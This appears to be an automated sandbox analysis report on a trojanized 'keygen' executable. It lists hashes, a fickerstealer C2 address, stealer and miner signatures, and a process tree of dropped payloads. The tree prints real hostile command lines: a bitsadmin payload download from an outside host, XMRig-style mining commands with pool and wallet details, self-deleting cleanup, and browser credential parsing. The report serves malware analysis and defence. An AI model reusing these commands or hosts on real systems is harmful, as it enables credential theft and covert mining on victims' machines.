Resubmissions

24-04-2021 06:39

210424-z9rcb7aepa 10

23-04-2021 19:10

210423-eqazybfbwe 10

23-04-2021 19:10

210423-11yc7me6fe 10

23-04-2021 18:20

210423-96m9f6fxjx 10

23-04-2021 13:38

210423-fv1qhsltzj 10

23-04-2021 13:38

210423-6hhapn6pdx 10

23-04-2021 13:38

210423-m5azl6mq1s 10

23-04-2021 13:38

210423-nlvbxenam6 10

23-04-2021 13:38

210423-y4rkc8l6ts 10

23-04-2021 05:23

210423-lejp16ex1n 10

Analysis

  • max time kernel
    814s
  • max time network
    816s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    22-04-2021 19:05

Errors

Reason
Machine shutdown

General

  • Target

    keygen-step-4.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • ElysiumStealer

    ElysiumStealer (previously known as ZeromaxStealer) is an info stealer that can steal login credentials for various accounts.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 2 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 7 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
  • Suspicious use of SetThreadContext 11 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 9 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 13 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 25 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
    1⤵
      PID:2400
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2728
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2720
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2712
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2420
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1868
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
              1⤵
                PID:1408
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1396
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1176
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1100
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:1036
                      • C:\Users\Admin\AppData\Roaming\fvbtbaa
                        C:\Users\Admin\AppData\Roaming\fvbtbaa
                        2⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:2220
                      • C:\Users\Admin\AppData\Roaming\thbtbaa
                        C:\Users\Admin\AppData\Roaming\thbtbaa
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:4140
                        • C:\Users\Admin\AppData\Roaming\thbtbaa
                          C:\Users\Admin\AppData\Roaming\thbtbaa
                          3⤵
                          • Executes dropped EXE
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:4476
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                      1⤵
                        PID:296
                      • C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
                        "C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
                        1⤵
                        • Checks computer location settings
                        • Suspicious use of WriteProcessMemory
                        PID:488
                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                          2⤵
                          • Executes dropped EXE
                          • Drops file in Program Files directory
                          • Suspicious use of SetWindowsHookEx
                          • Suspicious use of WriteProcessMemory
                          PID:2880
                          • C:\Windows\SysWOW64\rundll32.exe
                            "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                            3⤵
                            • Loads dropped DLL
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:2296
                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:1568
                          • C:\ProgramData\7579183.exe
                            "C:\ProgramData\7579183.exe"
                            3⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2264
                          • C:\ProgramData\2183556.exe
                            "C:\ProgramData\2183556.exe"
                            3⤵
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Suspicious use of WriteProcessMemory
                            PID:184
                            • C:\ProgramData\Windows Host\Windows Host.exe
                              "C:\ProgramData\Windows Host\Windows Host.exe"
                              4⤵
                              • Executes dropped EXE
                              PID:728
                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of WriteProcessMemory
                          PID:208
                          • C:\Users\Admin\AppData\Local\Temp\is-4PMMF.tmp\Install.tmp
                            "C:\Users\Admin\AppData\Local\Temp\is-4PMMF.tmp\Install.tmp" /SL5="$6007A,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                            3⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of WriteProcessMemory
                            PID:1000
                            • C:\Users\Admin\AppData\Local\Temp\is-FOR18.tmp\Ultra.exe
                              "C:\Users\Admin\AppData\Local\Temp\is-FOR18.tmp\Ultra.exe" /S /UID=burnerch1
                              4⤵
                              • Drops file in Drivers directory
                              • Executes dropped EXE
                              • Adds Run key to start application
                              • Suspicious use of WriteProcessMemory
                              PID:184
                              • C:\Program Files\Windows Portable Devices\MYQNQHASBN\ultramediaburner.exe
                                "C:\Program Files\Windows Portable Devices\MYQNQHASBN\ultramediaburner.exe" /VERYSILENT
                                5⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:4124
                                • C:\Users\Admin\AppData\Local\Temp\is-9JFA3.tmp\ultramediaburner.tmp
                                  "C:\Users\Admin\AppData\Local\Temp\is-9JFA3.tmp\ultramediaburner.tmp" /SL5="$30200,281924,62464,C:\Program Files\Windows Portable Devices\MYQNQHASBN\ultramediaburner.exe" /VERYSILENT
                                  6⤵
                                  • Executes dropped EXE
                                  • Drops file in Program Files directory
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of FindShellTrayWindow
                                  • Suspicious use of WriteProcessMemory
                                  PID:4156
                                  • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                    "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                    7⤵
                                    • Executes dropped EXE
                                    PID:4300
                              • C:\Users\Admin\AppData\Local\Temp\d4-abe99-13e-416b3-93ef7295454a1\Qashysyshibo.exe
                                "C:\Users\Admin\AppData\Local\Temp\d4-abe99-13e-416b3-93ef7295454a1\Qashysyshibo.exe"
                                5⤵
                                • Executes dropped EXE
                                • Checks computer location settings
                                PID:4180
                              • C:\Users\Admin\AppData\Local\Temp\0d-dee82-5e9-418af-3216a1b81110e\Kyxazhibeda.exe
                                "C:\Users\Admin\AppData\Local\Temp\0d-dee82-5e9-418af-3216a1b81110e\Kyxazhibeda.exe"
                                5⤵
                                • Executes dropped EXE
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of WriteProcessMemory
                                PID:4232
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ecu52s5g.2xz\instEU.exe & exit
                                  6⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:760
                                  • C:\Users\Admin\AppData\Local\Temp\ecu52s5g.2xz\instEU.exe
                                    C:\Users\Admin\AppData\Local\Temp\ecu52s5g.2xz\instEU.exe
                                    7⤵
                                    • Executes dropped EXE
                                    PID:1252
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hldbrcua.ko5\gpooe.exe & exit
                                  6⤵
                                    PID:4652
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xmk2z1lu.agr\google-game.exe & exit
                                    6⤵
                                      PID:4672
                                      • C:\Users\Admin\AppData\Local\Temp\xmk2z1lu.agr\google-game.exe
                                        C:\Users\Admin\AppData\Local\Temp\xmk2z1lu.agr\google-game.exe
                                        7⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetWindowsHookEx
                                        PID:5796
                                        • C:\Windows\SysWOW64\rundll32.exe
                                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                          8⤵
                                          • Loads dropped DLL
                                          • Modifies registry class
                                          PID:4968
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0osutmo1.ixr\md1_1eaf.exe & exit
                                      6⤵
                                        PID:5180
                                        • C:\Users\Admin\AppData\Local\Temp\0osutmo1.ixr\md1_1eaf.exe
                                          C:\Users\Admin\AppData\Local\Temp\0osutmo1.ixr\md1_1eaf.exe
                                          7⤵
                                          • Executes dropped EXE
                                          • Checks whether UAC is enabled
                                          PID:1680
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\a2crv3ey.3zz\askinstall36.exe & exit
                                        6⤵
                                          PID:2088
                                          • C:\Users\Admin\AppData\Local\Temp\a2crv3ey.3zz\askinstall36.exe
                                            C:\Users\Admin\AppData\Local\Temp\a2crv3ey.3zz\askinstall36.exe
                                            7⤵
                                              PID:4944
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd.exe /c taskkill /f /im chrome.exe
                                                8⤵
                                                  PID:4476
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /f /im chrome.exe
                                                    9⤵
                                                    • Kills process with taskkill
                                                    PID:5940
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zxeot0u2.lqy\YGJQQSTYUE.exe & exit
                                              6⤵
                                                PID:5272
                                                • C:\Users\Admin\AppData\Local\Temp\zxeot0u2.lqy\YGJQQSTYUE.exe
                                                  C:\Users\Admin\AppData\Local\Temp\zxeot0u2.lqy\YGJQQSTYUE.exe
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:5588
                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"
                                                    8⤵
                                                      PID:4188
                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                        parse.exe -f json -b firefox
                                                        9⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        PID:5024
                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                        parse.exe -f json -b chrome
                                                        9⤵
                                                          PID:3960
                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                          parse.exe -f json -b edge
                                                          9⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          PID:4424
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yibkkxuj.cp1\y1.exe & exit
                                                    6⤵
                                                      PID:2796
                                                      • C:\Users\Admin\AppData\Local\Temp\yibkkxuj.cp1\y1.exe
                                                        C:\Users\Admin\AppData\Local\Temp\yibkkxuj.cp1\y1.exe
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        PID:5300
                                                        • C:\Users\Admin\AppData\Local\Temp\irkNbl90lz.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\irkNbl90lz.exe"
                                                          8⤵
                                                          • Executes dropped EXE
                                                          • Modifies system certificate store
                                                          PID:6056
                                                          • C:\Users\Admin\AppData\Roaming\1619125844362.exe
                                                            "C:\Users\Admin\AppData\Roaming\1619125844362.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619125844362.txt"
                                                            9⤵
                                                            • Executes dropped EXE
                                                            PID:5960
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\irkNbl90lz.exe"
                                                            9⤵
                                                              PID:5512
                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                ping 127.0.0.1 -n 3
                                                                10⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                • Runs ping.exe
                                                                PID:4188
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\yibkkxuj.cp1\y1.exe"
                                                            8⤵
                                                              PID:1688
                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                timeout /T 10 /NOBREAK
                                                                9⤵
                                                                • Delays execution with timeout.exe
                                                                PID:4172
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bmj0fy3x.rob\toolspab1.exe & exit
                                                          6⤵
                                                            PID:6088
                                                            • C:\Users\Admin\AppData\Local\Temp\bmj0fy3x.rob\toolspab1.exe
                                                              C:\Users\Admin\AppData\Local\Temp\bmj0fy3x.rob\toolspab1.exe
                                                              7⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of SetThreadContext
                                                              PID:3188
                                                              • C:\Users\Admin\AppData\Local\Temp\bmj0fy3x.rob\toolspab1.exe
                                                                C:\Users\Admin\AppData\Local\Temp\bmj0fy3x.rob\toolspab1.exe
                                                                8⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                • Checks SCSI registry key(s)
                                                                • Suspicious behavior: MapViewOfSection
                                                                PID:988
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\izf3s1ps.ib5\SunLabsPlayer.exe /S & exit
                                                            6⤵
                                                              PID:3872
                                                              • C:\Users\Admin\AppData\Local\Temp\izf3s1ps.ib5\SunLabsPlayer.exe
                                                                C:\Users\Admin\AppData\Local\Temp\izf3s1ps.ib5\SunLabsPlayer.exe /S
                                                                7⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                • Drops file in Program Files directory
                                                                PID:6112
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp8FDF.tmp\tempfile.ps1"
                                                                  8⤵
                                                                    PID:5480
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp8FDF.tmp\tempfile.ps1"
                                                                    8⤵
                                                                      PID:4136
                                                                      • C:\Windows\System32\Conhost.exe
                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        9⤵
                                                                        • Executes dropped EXE
                                                                        PID:4944
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp8FDF.tmp\tempfile.ps1"
                                                                      8⤵
                                                                        PID:5020
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp8FDF.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:3676
                                                                          • C:\Windows\System32\Conhost.exe
                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            9⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                            PID:3960
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp8FDF.tmp\tempfile.ps1"
                                                                          8⤵
                                                                            PID:2220
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp8FDF.tmp\tempfile.ps1"
                                                                            8⤵
                                                                              PID:4140
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp8FDF.tmp\tempfile.ps1"
                                                                              8⤵
                                                                              • Checks for any installed AV software in registry
                                                                              PID:4972
                                                                            • C:\Windows\SysWOW64\bitsadmin.exe
                                                                              "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                              8⤵
                                                                              • Download via BitsAdmin
                                                                              PID:6048
                                                                            • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                              "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pXModaxNw9V0MI8B -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                              8⤵
                                                                              • Executes dropped EXE
                                                                              PID:5116
                                                                            • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                              "C:\Program Files (x86)\lighteningplayer\data_load.exe" -peQFeVle8bIIZ63j -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                              8⤵
                                                                              • Executes dropped EXE
                                                                              PID:5060
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp8FDF.tmp\tempfile.ps1"
                                                                              8⤵
                                                                                PID:200
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp8FDF.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                  PID:5780
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp8FDF.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                    PID:4860
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp8FDF.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                      PID:6100
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp8FDF.tmp\tempfile.ps1"
                                                                                      8⤵
                                                                                        PID:5624
                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\rjtzvgWnL\rjtzvgWnL.dll" rjtzvgWnL
                                                                                        8⤵
                                                                                        • Loads dropped DLL
                                                                                        PID:5464
                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                          C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\rjtzvgWnL\rjtzvgWnL.dll" rjtzvgWnL
                                                                                          9⤵
                                                                                          • Loads dropped DLL
                                                                                          • Drops file in System32 directory
                                                                                          PID:5248
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp8FDF.tmp\tempfile.ps1"
                                                                                        8⤵
                                                                                          PID:5924
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp8FDF.tmp\tempfile.ps1"
                                                                                          8⤵
                                                                                          • Drops file in Program Files directory
                                                                                          PID:6024
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp8FDF.tmp\tempfile.ps1"
                                                                                          8⤵
                                                                                            PID:5572
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp8FDF.tmp\tempfile.ps1"
                                                                                            8⤵
                                                                                              PID:5720
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp8FDF.tmp\tempfile.ps1"
                                                                                              8⤵
                                                                                                PID:5680
                                                                                              • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                8⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                PID:5024
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qruaymvo.uuw\GcleanerWW.exe /mixone & exit
                                                                                            6⤵
                                                                                              PID:4984
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yzjmifx0.qya\inst.exe & exit
                                                                                              6⤵
                                                                                                PID:3736
                                                                                                • C:\Users\Admin\AppData\Local\Temp\yzjmifx0.qya\inst.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\yzjmifx0.qya\inst.exe
                                                                                                  7⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:5064
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bv4twu1a.jvg\c7ae36fa.exe & exit
                                                                                                6⤵
                                                                                                  PID:5368
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\bv4twu1a.jvg\c7ae36fa.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\bv4twu1a.jvg\c7ae36fa.exe
                                                                                                    7⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Loads dropped DLL
                                                                                                    • Checks SCSI registry key(s)
                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                    PID:4420
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sxuy1b5v.dga\app.exe /8-2222 & exit
                                                                                                  6⤵
                                                                                                    PID:5092
                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • Modifies system certificate store
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:4368
                                                                                            • C:\Users\Admin\AppData\Roaming\D6BE.tmp.exe
                                                                                              "C:\Users\Admin\AppData\Roaming\D6BE.tmp.exe"
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of SetThreadContext
                                                                                              PID:5780
                                                                                              • C:\Users\Admin\AppData\Roaming\D6BE.tmp.exe
                                                                                                "C:\Users\Admin\AppData\Roaming\D6BE.tmp.exe"
                                                                                                4⤵
                                                                                                • Executes dropped EXE
                                                                                                • Checks processor information in registry
                                                                                                PID:5020
                                                                                            • C:\Users\Admin\AppData\Roaming\D8F2.tmp.exe
                                                                                              "C:\Users\Admin\AppData\Roaming\D8F2.tmp.exe"
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              • Adds Run key to start application
                                                                                              • Suspicious use of SetThreadContext
                                                                                              PID:5876
                                                                                              • C:\Windows\system32\msiexec.exe
                                                                                                -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w4566@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                4⤵
                                                                                                  PID:1508
                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                  -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w10760 --cpu-max-threads-hint 50 -r 9999
                                                                                                  4⤵
                                                                                                  • Blocklisted process makes network request
                                                                                                  PID:4900
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                                3⤵
                                                                                                  PID:4872
                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                    ping 127.0.0.1
                                                                                                    4⤵
                                                                                                    • Runs ping.exe
                                                                                                    PID:5028
                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                                2⤵
                                                                                                • Executes dropped EXE
